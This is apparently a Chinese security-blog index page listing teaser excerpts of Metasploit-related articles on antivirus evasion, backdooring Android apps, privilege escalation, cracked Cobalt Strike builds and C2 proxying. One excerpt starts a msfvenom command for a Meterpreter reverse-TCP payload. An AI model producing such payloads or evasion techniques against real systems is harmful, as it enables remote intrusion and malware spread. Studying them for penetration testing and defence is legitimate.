记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

利用Metasploit模板和自定义二进制文件绕过AV

在本文中,我们将为读者介绍两种简单的方法,让我们的shellcode可以顺利绕过防病毒引擎。   48/68的检出率   作为一个基准测试,让我们为
发布时间:2021-01-06 15:46 | 阅读:8140 | 评论:0 | 标签:metasploit metasploit payload SHELLCODE Virustotal windows

Metasploit免杀初探索

0x01 环境搭建 测试系统:windows10 (1909) 杀毒软件:360安全卫士 在线杀毒:VT 0x02 payload生成 msfVENOM -p windows/meterpreter/reverse_tcp LHOST=192.168.56.129 L
发布时间:2020-11-05 13:15 | 阅读:16197 | 评论:0 | 标签:安全管理 metasploit msfvenom Payload VT 免杀 编码 编码器 编码捆绑

Metasploit团队推社区版漏洞知识库

近日,Metasploit开发者——Rapid7公司宣布启动AttackerKB的Beta测试版,AttackerKB是基于社区的全新漏洞知识库,提供包括社区点评在内的有关漏洞的综合信息,以帮助安全团队更好地理解和分类威,以及筛选每年发现的大量新漏洞。根据NIST NVD的数据,2019年宣布了约17,500个漏洞-是2016年的两倍多,不出意外今年的漏洞数可能会超过这个数字。
发布时间:2020-04-17 20:07 | 阅读:57379 | 评论:0 | 标签:行业动态 首页动态 metasploit 漏洞知识库 漏洞

利用AlwaysInstallElevated提权的测试分析

0x00 前言利用AlwaysInstallElevated提权是一个2017年公开的技术,Metasploit和PowerUp都提供了利用方法。我在研究的过程中,发现Metasploit的利用方法存在一些不足,我遇到了和其他公开文章描述不一样的情况。于是我做了进一步的研究,本文将要介绍我遇到的问题和解决方法。
发布时间:2019-07-22 12:30 | 阅读:97012 | 评论:0 | 标签:技术 Metasploit 提权

meterpreter必知必会的15个命令

meterpreter是一种高级、隐蔽、多层面的且可动态扩展的payload,可以将反射dll注入到目标主机的内存中,还可以在运行时动态加载脚本和插件来进行后渗透利用。包括提权、转存系统账号、键盘记录、持久后门服务、启用远程桌面等,还有很多其他的扩展。而且,meterpreter shell的整个通信都是默认加密的。因为meterpreter提供的是一个全新的环境,所以我们本文来讲解一些必备的meterpreter命令,带你入门并且逐渐熟悉这款强大的工具。命令1:上传文件到Windows主机简单来说,你可以上传本机的任意文件到远程目标主机中。
发布时间:2018-10-25 12:20 | 阅读:151336 | 评论:0 | 标签:安全工具 Metasploit Meterpreter

metasploit模块可以利用shellshock漏洞getshell

过去5年中出现的最严重的漏洞之一就是shellshock漏洞,此漏洞允许攻击者通过Unix bash shell远程执行任意代码。此漏洞出现有一段时间了,不过由于连接到web的Unix主机普遍存在,所以这个漏洞还是有很大威胁的,尤其是那些没有打补丁的系统。 shellshock工作原理shellshock首次出现于2014年9月。在漏洞首次披露的几小时内,就有报道发生了攻击,并且在接下来的几天内,有数百万次的攻击和探测来自僵尸网络。bash是一个shell,或者叫解释器,允许在系统上执行命令。
发布时间:2018-08-10 12:20 | 阅读:192762 | 评论:0 | 标签:漏洞 getshell Metasploit shellshock

【Web安全】渗透测试介绍|附实例

阅读: 0本篇文章主要讲解一些在web安全领域渗透测试的基础知识点,以普及类信息为主,介绍渗透测试的流程和渗透工具的使用方法例如:sqlmap、metaspolit等,及一些实际应用场景。
发布时间:2018-04-24 15:05 | 阅读:355660 | 评论:0 | 标签:威胁通报 Metasploit sqlmap Web安全 渗透测试 渗透测试工具 灰盒测试 白盒测试 黑盒测试

修改Metasploit安卓Payload源码以实现持久化访问

* 本文作者:xiaohuanshu,本文属FreeBuf原创奖励计划,未经许可禁止转载 Metasploit-Payload是广泛使用的安卓后门之一,然而无论是直接使用msfvenom生成的apk文件,还是通过其他手段将payload注入到已有apk中,其连接稳定性都非常差,基本在APP启动的一刹那可以建立连接,如果网络不稳定,中断后不会再次连接。本文将通过直接修改安卓payload源码已实现持久化访问。
发布时间:2017-07-27 11:05 | 阅读:780456 | 评论:0 | 标签:工具 Metasploit

如何手动将Metasploit的Payloads注入到Android应用中

由于大多数Android应用缺乏对二进制文件足够的保护,因此攻击者可以将一些恶意的payload轻松地植入到那些合法的Android应用中。这也是现如今,导致Android机中恶意软件传播迅速的重要原因之一。在我之前写的一篇文章中,我已经为大家演示了如何使用脚本将Metasploit payload注入到android应用中。在本文我将通过手动的方式实现payload的注入。 步骤1 – 生成payload 我们首先使用Metasploit MsfVenom来生成一个APK格式的Meterpreter payload文件。
发布时间:2017-07-07 17:00 | 阅读:194317 | 评论:0 | 标签:网络安全 Andriod应用 Metasploit payloads 注入 Android

Metasploit实验:制作免杀payload+对任意“外网”主机的远控

*本文只做技术交流之用,技术无罪,希望大家知法懂法,更要守法 我发一个文件,你电脑就被我控制了,我可以拍照摄像下载文件,杀毒软件也不管用
发布时间:2017-06-14 10:45 | 阅读:249675 | 评论:0 | 标签:工具 系统安全 网络安全 Metasploit 远程控制

如何用Meterpreter实现Nmap

发送钓鱼攻击,目标运行Meterpreter载荷,其系统上有了壳(Shell)。关注我们博客,可能你对后续工作有很多想法,原因很多:端口扫描很乱,许多IDS包设置对此类活动警报迅速,且大多数无需实现既定目标。而假设需在其他系统上找出服务,可有以下备选。 Metasploit配有多个内置扫描仪模块,可在系统配置Meterpreter后使用。只需在Metasploit里添加一个路径,通过路径传输,为扫描模块提供扫描地址、扫描、等待结果。个人认为对其使用上可能存在差距:有时反馈不多,结果也不总一致,当然也有可能是用户错误,本人还是偏爱比提供模块更灵活的方式。 像用Nmap来进行扫描。
发布时间:2017-06-08 21:25 | 阅读:158429 | 评论:0 | 标签:工具 metasploit Meterprete nmap

Metasploit Framework详解

Metasploit介绍 几乎每一个玩渗透的人都会接触到Metasploit Framework,简称msf。这是一个渗透测试框架,用ruby语言写的,该框架集成了很多可用的exploit,比如著名的ms08_067等。你可以在这个框架下进行一系列的渗透测试,利用现有的Payload,如Meterpreter等进一步拿取对方的shell。下载的地址在github上面,Git clone该项目到本地进行安装即可。 常用工具介绍 msfconsole 这是启动msf的终端命令,注意因为现在msf默认的数据库是postgresql,所以在启动msf之前需要先启动postgresql数据库。
发布时间:2017-06-08 21:25 | 阅读:208577 | 评论:0 | 标签:工具 metasploit msf 渗透测试

内网大杀器!Metasploit移植MS17-010漏洞代码模块利用

0x01 引言 2017年4月,网络最为轰动的事件无疑是TheShadowBrokers放出一大批NSA(美国国家安全局)“方程式组织” (Equation Group)使用的极具破坏力的黑客工具,其中包括可以远程攻破全球约70%Windows机器的漏洞利用工具。一夜之间,全世界70%的windows服务器置于危险之中,国内使用windows服务器的高校、国企甚至政府机构也不能幸免。这对互联网无疑造成了一次大地震,因为已经很久没有出现过像MS17-010这种级别的漏洞了,因此就被大家笑语说出了“指哪打哪”这样一个事实。
发布时间:2017-05-04 16:40 | 阅读:1164108 | 评论:2 | 标签:技术 Eternalblue Metasploit 内网安全 漏洞

说说Powersploit在内网渗透中的使用

先说: 第一次写,大家轻点喷,扫扫盲… 内网环境下,我们用metasploit生成一个payload,万一运气稍微好点的,碰到了像360这些东西,我等小白是一脸懵的,这种情况下,就可以想powershell,总不会杀软连这个都要杀吧。 总之powershell + metasploit,双剑合璧,对我们来说在内网渗透中对我们还是有很大的帮助的,可以说是一个巨大的隐藏宝藏! 进入正题 一.Powershell 我们先来说说powershell,PowerShell 是运行在 Windows上实现系统和应用程序管理自动化的命令行脚本环境。
发布时间:2017-04-14 00:45 | 阅读:285473 | 评论:0 | 标签:工具 网络安全 Metasploit powershell

Metasploit、powershell之Windows错误系统配置漏洞实战提权

*原创作者:shuteer,本文属FreeBuf原创奖励计划,未经许可禁止转载 0×01 引言 我们在获得目标机一个普通的权限时,除了常规提权方法外,还可以通过查找目标主机错误的系统配置和漏洞来获取系统权限。本节所讲的“Trusted Service Paths(可信任服务路径)漏洞”和“系统服务的错误权限配置漏洞”绝对是你值得尝试的一个环节。
发布时间:2017-04-11 22:15 | 阅读:179178 | 评论:0 | 标签:系统安全 Metasploit powershell Windows提权 Windows错误系统配置漏洞 提权 漏洞

Rapid7发布Metasploit攻防模拟实训工具

项目地址 https://github.com/rapid7/metasploit-vulnerability-emulator 简介 许人想要学习安全方面的技能,因为现在这是一个非常热门的领域。网上有很多免费工具可供使用学习,其中最有名的是Metasploit。然而,没有包含特定漏洞的服务器用来测试,很难学会使用Metasploit。
发布时间:2017-03-10 04:30 | 阅读:276551 | 评论:0 | 标签:工具 Kali linux metasploit 渗透测试 漏洞 黑客攻击

Metasploit官方攻防模拟实训工具:Metasploit Vulnerable Services Emulator发布

如何用最好地保护一个系统免受黑客攻击?当然是站在黑客的视角来看待系统的安全问题。昨日Metasploit就以此为出发点,发布了一个漏洞模拟工具——Metasploit Vulnerable Services Emulator。作为一款开源工具,安全人员可以通过它提供的漏洞操作平台来测试渗透测试目标。
发布时间:2017-03-08 16:55 | 阅读:178968 | 评论:0 | 标签:工具 Metasploit

本地文件包含漏洞利用技巧

0x00 前言 本文的主要目的是分享在服务器遭受文件包含漏洞时,使用各种技术对Web服务器进行攻击的想法。 我们都知道LFI漏洞允许用户通过在URL中包括一个文件。在本文中,我使用了bWAPP和DVWA两个不同的平台,其中包含文件包含漏洞的演示。通过它我以四种不同的方式执行LFI攻击。 0x01 基本本地文件包含 在浏览器中输入目标IP,并在BWAPP内登录(bee:bug),现在选择bug:remote & local file Inclusion,然后点击hack。 打开具有RFI和LFI漏洞的网页。在下拉列表中选择语言释,单击go按钮时,所选的语言文件将包含在URL中。
发布时间:2017-02-17 18:55 | 阅读:335613 | 评论:0 | 标签:Web安全 bWAPP DVWA metasploit Null byte PHP Input 本地文件包含 漏洞

Metasploit物联网安全渗透测试增加对硬件的支持

开源的Metasploit渗透测试框架新增加了对硬件的支持,使研究人员能够借此研究物联网设备,汽车被选作首个研究用例。   自2009年10月起,安全厂商Rapid7就在引领开源Metasploit渗透测试框架项目,之前的研究以软件为主。然而,Rapid7于2月2日宣布了一项新的Metasploit的扩展功能,使安全研究人员直接链接到硬件从而进行漏洞检测。 新硬件兼容功能已被添加到开源Metasploit框架里,用户可以通过GitHub来获取。此外,Rapid7计划将这一功能打包发布在开源Metasploit社区里。 Metasploit一直具有有线/无线连接设备的功能。
发布时间:2017-02-07 00:15 | 阅读:179251 | 评论:0 | 标签:技术产品 metasploit 渗透测试 物联网安全 车联网

添加Metasploit-payload到已有的Android项目中

*本文原创作者:xiaohuanshu,本文属FreeBuf原创奖励计划,未经许可禁止转载 metasploit在写这篇文章之前,笔者可以说是对java一窍不通,也从来没有写过什么Android应用,在几天的摸爬滚打中终于实现了最终的目的,就是在已有Apk源码的情况下,用了比较另类的方式,添加metasploit后门。 同时支持java/scala两种语言写的项目,主要是为了给大家提供一些思路,如果哪里写的不准确,欢迎指正。
发布时间:2017-01-19 16:40 | 阅读:187019 | 评论:0 | 标签:系统安全 终端安全 Metasploit Android

内网渗透的一些工具和平台汇总

各位老司机在日常的渗透过程中,都会有自己趁手的工具集合,有开源的有私有的,不管什么样的工具组合,能够达到最佳的渗透效果就是好工具,老司机分享一点自己在内网渗透中惯用的开源工具和平台。 渗透测试平台类 Metasploit:这个大家都不陌生了,集信息收集,预渗透,渗透,后渗透,木马,社会工程学于一体的平台,居家旅行,杀人越货之必备。 SET(Social-engineer-toolkit):主要用来做社工平台,邮件伪造,dns劫持,以及office钓鱼。 Cobaltstrike:目前来说最好用的针对windows的渗透平台,也是目前最牛逼的APT协同工作平台。
发布时间:2017-01-08 17:00 | 阅读:358408 | 评论:0 | 标签:内网渗透 cobaltstrike Empire metasploit powershell SET 内网渗透工具 内网

Empyre:渗透Mac OSX的漏洞利用框架

简介 EmPyre是一款基于Python,远程入侵OSX系统的Post Exploitation框架工具。它内置有OSX漏洞利用模块,与Metasploit相比,让人耳目一新。 安装 git clone  https://github.com/adaptivethreat/EmPyre/ 进入EmPyre目录运行安装脚本install.sh 就这样,EmPyre安装并准备就绪,现在只要进入EmPyre目录运行./empyre就可以启动界面。
发布时间:2016-11-16 22:25 | 阅读:163780 | 评论:0 | 标签:工具 Empyre EmPyre Web EmPyre Web Interface Exploitation Mac O

多工具多用户HTTP代理

背景 目前许多流行的命令和控制(C2)工具通过HTTP操作(Metasploit和Empire)。HTTP作为C2有效协议的原因之一是它几乎允许存在于每个网络并且期望来自每个网络设备的行为。此外,使用HTTP over TLS为这些工具增加了一层额外的安全性,因为它使得检查C2流量成为一个挑战。正确配置Web代理执行SSL / TLS的检查能够更好地检测C2的流量,但在测试的组织中通常不会看到此功能。 为了看起来尽可能正常,HTTP C2流量应该在80和443端口上操作。如使用8080端口将引起更多的怀疑。一个有趣的问题是我喜欢在同一个主机上使用多个工具。
发布时间:2016-11-01 17:15 | 阅读:196082 | 评论:0 | 标签:Web安全 C2代理 Empire HTTP代理 metasploit Msfconsole nginx 反向代理 命令

2016最流行的Linux发行版渗透测试系统

Kali Linux 简介 BackTrack到Kali,Kali Linux 其中已经包含了300多安全渗透工具,Armitage是一款Java写的Metasploit图形界面的攻击软件,可以用它结合Metasploit已知的Exploit来针对存在的漏洞自动化攻击,Nmap也就是Network Mapper,是一款端口扫描软件,用来扫描网上电脑开放的网络端口。确定哪些服务运行在哪些端口,并且推断计算机运行哪个操作系统,它能够通过枚举SSL/TLS协议版本和密码套件来快速分析TLS连接。它还能够迅速识别部署问题,能够轻易发现包含漏洞的服务器。
发布时间:2016-11-01 17:15 | 阅读:225087 | 评论:0 | 标签:工具 ArchStrike BackTrack Blackarch Kali metasploit Parrot 渗透测

Cobalt Strike v3.5.1 20161003 Cracked 无弹窗提示(远程执行修复)

前言 Armitage是一款Java写的Metasploit图形界面的渗透测试软件,可以用它结合Metasploit已知的exploit来针对存在的漏洞自动化攻击。bt5、kali LINX下集成免费版本阿米蒂奇,Cobaltstrike是它的商业版本,乃们懂得,图形界面非常友好,一键傻瓜化使用MSF高级功能,自动渗透测试。而Cobalt Strike 3.0后的版本已经不再使用Metasploit框架而作为一个独立的平台使用。
发布时间:2016-10-20 23:30 | 阅读:321724 | 评论:0 | 标签:工具 Armitage Cobalt strike Cobalt Strike破解版 metasploit msf 自动

打造不被检测的Metasploit WAR

在渗透测试期间,目标服务器如果是Windows的,目标服务器可能安装有JAVA版管理管理控制程序(例如:WAS、JBOSS和Tomcat),该服务器具有默认或者是可猜测(可以进行爆破攻击)的管理凭据。
发布时间:2016-10-12 22:10 | 阅读:167096 | 评论:0 | 标签:Web安全 jboss metasploit Metasploit WAR msfvenom Payload tomca

Cobalt Strike 3.5发行增强linux后渗透功能(附Cracked)

Armitage是一个图形化的metasploit网络攻击管理工具,它可视化你的攻击目标,推荐exploit和公开了metasploit框架的高级功能。 Bt5、Kali Linux下集成免费版Armitage,Cobaltstrike是它的商业版本,图形界面非常友好,一键傻瓜化使用MSF高级功能,自动渗透测试。 后渗透 Cobaltstrike的SSH会话给你后渗透功能的一系列基本运行命令,上传/下载文件,和pivot。 拓展:《Cobalt strike browser pivot的应用实例》 命令可以运行您提供的命令和参数。运行您更改当前工作目录的cd命令。pwd命令将显示当前工作目录。
发布时间:2016-09-27 13:00 | 阅读:481358 | 评论:0 | 标签:工具 Armitage Cobalt strike Cobalt Strike 3.5 Cobalt Strike 3.

Windows域横向渗透

环境拓扑 我们的目的是获取redhook.DA域的一个可用的账户,当前攻击者已在公司网络内,但并未在同一个子网。 Compromising Client 1 假设我们已经获取到了Client1的登陆凭据,如果网络足够大,你可以发现存储在某处网络共享上面的其他凭据(通过批量的脚本:vbs,ps1,.net等等)。关于怎么访问网络,你可以使用Cobalt Strike框架。 我们可以这样做: 我们可以通过批量的脚本快速的获得NETBIOS的信息。 在win上,可以用命令nbtstat -A IP获得相同的信息,可以看到机器名是WIN7-ENT-CLI1,属于REDHOOK域。
发布时间:2016-09-20 21:35 | 阅读:274384 | 评论:0 | 标签:内网渗透 文章 exploit Incognito metasploit mimikatz PowerSploit 信息

POWERSHELL EMPIRE + CVE-2016-0189 = PROFIT

Powershell Empire 是我们在渗透目标用户时一直都很喜欢的工具之一,虽然我们通常都是用Metaspolit和Empire来一起完成工作,使浏览器漏洞和经验结合在Empire中。 在最近的一次测试中我们没有选择去使用MSF,相反我们和一个新的“经验丰富”的Empire一起利用CVE-2016-0189(也就是vbscrupt_godmode)其攻击使用IE9—11的用户。Empire是近6个月来我们首选的使用并且最近开始打造漏洞工具箱。如果成功,powershell将会登录并通过一个代理链接到Empire。重要的是硬盘上不会留下任何信息。
发布时间:2016-09-18 21:35 | 阅读:153600 | 评论:0 | 标签:内网渗透 CVE-2016-0189 metasploit powershell Powershell Empire P

公告

❤人人都能成为掌握黑客技术的英雄⛄️

ADS

标签云